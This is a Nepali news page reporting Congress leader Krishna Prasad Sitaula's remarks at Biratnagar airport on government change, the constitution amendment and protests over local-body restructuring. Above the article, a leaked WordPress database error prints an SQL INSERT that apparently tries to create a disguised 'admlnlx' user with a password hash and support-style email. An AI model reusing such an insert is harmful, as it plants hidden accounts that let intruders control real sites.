WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$By2CBUgQpDvyTy8n2O0t5hdPVJDX/C0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 08:42:07', '', 'admlnlx', 'admlnlx')
पथरी ९मोरङ०,मंसिर २३-
नेपाली काँग्रेसका नेता कृष्णप्रसाद सिटौलाले स्थानीय निकायको निर्वाचन नहुन्जेल सरकार परिवर्तन नहुने बताउनुभएको छ ।
आज विराटनगर विमानस्थलमा सञ्चारकर्मीलाई सङ्क्षिप्त प्रतिक्रिया दिँदै नेता सिटौलाले स्थानीय निकायको निर्वाचन नहुन्जेल सरकार परिवर्तन नहुने बताउनुभएको हो । सरकार परिवर्तनसम्बन्धी हल्ला हावादारी भएको उहाँले टिप्पणी गर्नुभयो ।
नेता सिटौलाले संसद्मा दर्ता भएको सविधान संशोधनको प्रस्तावमा सबै दलबीच छलफल र आपसी सहमतिबाट पारित हुन्छ भन्नुभयो । उहाँले स्थानीय निकायको पुनःसंरचनाका विषयलाई लिएर विभिन्न ठाउँमा भइरहेको आन्दोलन अधिकारको अन्दोलन भएको उल्लेख गर्नुभयो ।
सबै दल एक ठाउँमा उभिनुको विकल्प नभएको बताउँदै उहाँले भन्नुभयो – समस्या समाधानका लागि आन्दोलनरत दुवै पक्ष लचक भएर वार्तामा आउनुपर्छ । – रासस